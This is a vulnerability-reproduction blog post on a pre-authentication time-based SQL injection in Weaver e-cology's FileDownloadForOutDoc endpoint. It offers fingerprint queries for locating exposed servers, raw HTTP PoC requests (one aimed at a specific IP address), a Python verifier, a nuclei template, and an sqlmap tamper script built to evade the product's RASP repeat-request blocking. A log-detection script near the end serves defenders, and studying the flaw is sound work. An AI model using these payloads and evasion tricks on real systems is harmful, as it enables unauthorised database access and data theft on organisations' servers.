[Vulnerability Reproduction] Weaver e-cology FileDownloadForOutDoc Pre-Auth SQL Injection

  1. [Vulnerability Reproduction] Weaver e-cology FileDownloadForOutDoc pre-auth SQL injection
  2. Affected versions
  3. Search syntax (fingerprint)
  4. PoC
  5. Tamper script

[Vulnerability Reproduction] Weaver e-cology FileDownloadForOutDoc Pre-Auth SQL Injection

HW season has exposed a whole pile of vulnerabilities lately, and it makes someone stuck preparing for the postgraduate entrance exam itch to try them. We can't get 0days, but we can still play with the high-frequency ones, so I collected thirty-some commonly used 2023 vulnerabilities and will reproduce them one by one whenever I have a spare moment. Right now I am studying C for the exam; after it I will probably keep digging into technical work, mainly in two directions, malware development and analysis, and web security, though nothing is settled yet (who knows, I might end up playing with web3). Wishing myself a successful admission this year.

Affected versions

Ecology 9.x with patch version < 10.58.0

Ecology 8.x with patch version < 10.58.0

Search syntax (fingerprint)

app.name="泛微 e-cology 9.0 OA"

app.name="泛微 e-cology OA"

app="泛微-协同商务系统"

PoC

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: 101.230.160.27:8885
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "AyurgkJJwkD"
If-Modified-Since: Sat, 15 Oct 2022 01:55:58 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

fileid=512+WAITFOR+DELAY+'0:0:8'&isFromOutImg=1

Weaver OA ships with RASP, and sending exactly the same request twice gets the repeat blocked, so every request must differ. The PoC below achieves this by randomising the numeric prefix of fileid ({random} below), which changes the request body on each send while keeping the injected expression valid. A short introduction to RASP follows.

RASP stands for Runtime Application Self-Protection, a security technology that protects an application against attacks. It performs detection and blocking while the application is running, implemented either inside the application itself or in a component tightly integrated with it.

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

fileid={random}+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1
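As an added example (not code from the original post), the check below automates the request above: it sends a baseline request and a WAITFOR DELAY request, each with a fresh random fileid prefix so no two requests are identical, and only reports the injection when the delayed request takes markedly longer than the baseline. The path and the fileid/isFromOutImg parameters are taken from the PoC; the threshold logic in looks_injected and the target host/port passed on the command line are this example's own assumptions.

```python
"""Time-based verifier for the FileDownloadForOutDoc injection (added example).

The target host and port are command-line arguments; nothing here is a real
target. The comparison threshold is an assumption of this example.
"""
import http.client
import random
import time
from urllib.parse import urlencode

PATH = "/weaver/weaver.file.FileDownloadForOutDoc"
HEADERS = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0",
    "Connection": "close",
}


def build_body(delay_seconds=0, prefix=None):
    """Return the form body; a fresh numeric prefix makes every request unique.

    delay_seconds == 0 gives the baseline request (a plain numeric fileid);
    anything else appends the MSSQL WAITFOR DELAY clause from the PoC.
    """
    if prefix is None:
        prefix = random.randint(1, 2 ** 20)
    fileid = str(prefix)
    if delay_seconds:
        fileid += " WAITFOR DELAY '0:0:%d'" % delay_seconds
    # urlencode turns spaces into '+' and quotes into %27, matching the PoC body
    return urlencode({"fileid": fileid, "isFromOutImg": "1"})


def timed_post(host, port, body, timeout):
    """POST the body to the target and return the round-trip time in seconds."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    started = time.monotonic()
    try:
        conn.request("POST", PATH, body=body, headers=HEADERS)
        conn.getresponse().read()
    finally:
        conn.close()
    return time.monotonic() - started


def looks_injected(baseline_seconds, delayed_seconds, delay_seconds, slack=0.8):
    """Decide from the two timings alone.

    The delayed request must exceed the baseline by at least `slack` of the
    requested delay. Comparing against a baseline instead of an absolute
    cut-off keeps a merely slow server from being reported as injectable.
    """
    return delayed_seconds - baseline_seconds >= slack * delay_seconds


def check(host, port, delay_seconds=5):
    """Return (verdict, baseline seconds, delayed seconds) for one target."""
    timeout = delay_seconds + 10
    baseline = timed_post(host, port, build_body(0), timeout)
    delayed = timed_post(host, port, build_body(delay_seconds), timeout)
    return looks_injected(baseline, delayed, delay_seconds), baseline, delayed


if __name__ == "__main__":
    import sys

    vulnerable, base, slow = check(sys.argv[1], int(sys.argv[2]))
    print("baseline %.2fs, delayed %.2fs -> %s"
          % (base, slow, "INJECTABLE" if vulnerable else "not confirmed"))
```

Run it as `python verify.py <host> <port>`; the baseline request doubles as a check that the endpoint is reachable and that the form body is being parsed at all.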

The nuclei PoC is as follows:

id: ecology-oa-filedownloadforoutdoc-sqli

info:
  name: EcologyOA FileDownloadForOutDoc - SQL injection (time-based)
  author: unknown
  severity: critical
  description: The EcologyOA /weaver/weaver.file.FileDownloadForOutDoc interface is vulnerable to time-based blind SQL injection through the fileid parameter
  tags: ecology-oa,sqli

requests:
  - raw:
      - |
        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        fileid={{rand_int(1000,999999)}}+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1
    # rand_int gives each request a different fileid prefix so the
    # repeated-request filter does not block the probe; duration is the
    # response time in seconds, so a real injection sleeps for at least 5 s.
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
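The same requests are what a defender needs to spot. As an added example from the detection side (not code from the original post), the script below checks request records for this endpoint: fileid is expected to be an integer, so a non-numeric value is suspicious no matter which random prefix was used, and a WAITFOR payload whose response took at least as long as the delay it asked for is strong evidence the statement actually executed. The JSON-lines log format and field names (ts, src, method, path, body, status, ms) are a constructed stand-in for what a reverse proxy or WAF that records POST bodies might emit; plain web-server access logs normally omit the body, so this check needs a log source that captures it.

```python
"""Detection logic for FileDownloadForOutDoc SQL injection attempts (added example).

The log lines below are constructed sample data, not real traffic, and the
record format is an assumption of this example.
"""
import json
import re
from urllib.parse import parse_qs

TARGET_PATH = "/weaver/weaver.file.FileDownloadForOutDoc"
# fileid is a numeric document id; anything else does not belong there
INT_RE = re.compile(r"^[0-9]+$")
# MSSQL time-based keywords from the PoC plus the usual companions
SQL_HINT_RE = re.compile(r"\b(WAITFOR|DELAY|SELECT|UNION|CONVERT|CHAR)\b", re.IGNORECASE)
DELAY_RE = re.compile(r"DELAY\s+'0:0:(\d+)'", re.IGNORECASE)

# Constructed sample: one legitimate download, the two PoC shapes, one unrelated hit
SAMPLE_LOG = """\
{"ts":"2023-08-10T03:12:01Z","src":"10.0.0.5","method":"POST","path":"/weaver/weaver.file.FileDownloadForOutDoc","body":"fileid=512&isFromOutImg=1","status":200,"ms":34}
{"ts":"2023-08-10T03:12:02Z","src":"198.51.100.7","method":"POST","path":"/weaver/weaver.file.FileDownloadForOutDoc","body":"fileid=512+WAITFOR+DELAY+'0:0:8'&isFromOutImg=1","status":200,"ms":8041}
{"ts":"2023-08-10T03:12:09Z","src":"198.51.100.7","method":"POST","path":"/weaver/weaver.file.FileDownloadForOutDoc","body":"fileid=739120+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1","status":200,"ms":5037}
{"ts":"2023-08-10T03:12:20Z","src":"10.0.0.8","method":"GET","path":"/login/Login.jsp","body":"","status":200,"ms":5}
"""


def classify(entry):
    """Return the reasons one record is suspicious (an empty list means benign)."""
    reasons = []
    if entry.get("path") != TARGET_PATH:
        return reasons
    params = parse_qs(entry.get("body", ""))
    fileid = params.get("fileid", [""])[0]
    if not INT_RE.match(fileid):
        reasons.append("fileid is not a plain integer: %r" % fileid)
    if SQL_HINT_RE.search(fileid):
        reasons.append("SQL keyword in fileid")
    # If the response took at least as long as the requested delay, the
    # injected WAITFOR most likely ran rather than being rejected.
    m = DELAY_RE.search(fileid)
    if m and entry.get("ms", 0) >= int(m.group(1)) * 1000:
        reasons.append("response time matches requested delay (injection likely executed)")
    return reasons


def scan(log_text):
    """Return [(source ip, reasons)] for every suspicious record; skip malformed lines."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            entry = json.loads(line)
        except ValueError:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry.get("src"), reasons))
    return hits


if __name__ == "__main__":
    for src, reasons in scan(SAMPLE_LOG):
        print(src, "; ".join(reasons))
```

The integer check is the one that survives evasion: the tamper trick below changes the value of fileid on every request, but never makes it numeric again.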

Tamper script

#!/usr/bin/env python
"""sqlmap tamper: prepend a random integer to every payload.

Each request then differs from the last, so the repeated-request filter
does not block the time-based probes. Run it as, for example:
    sqlmap -r request.txt -p fileid --tamper=<this file> --technique=T
"""
import random

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGH


def tamper(payload, **kwargs):
    # fileid is numeric, so a random numeric prefix keeps the expression
    # well-formed ("4711 WAITFOR DELAY ...") while making it unique.
    if payload:
        payload = str(random.randint(1, 2 ** 20)) + payload
    return payload

Please credit the source when reposting. Readers are welcome to verify the sources cited in this article and to point out anything wrong or unclear. A comment section may come later; you can also reach me on GitHub.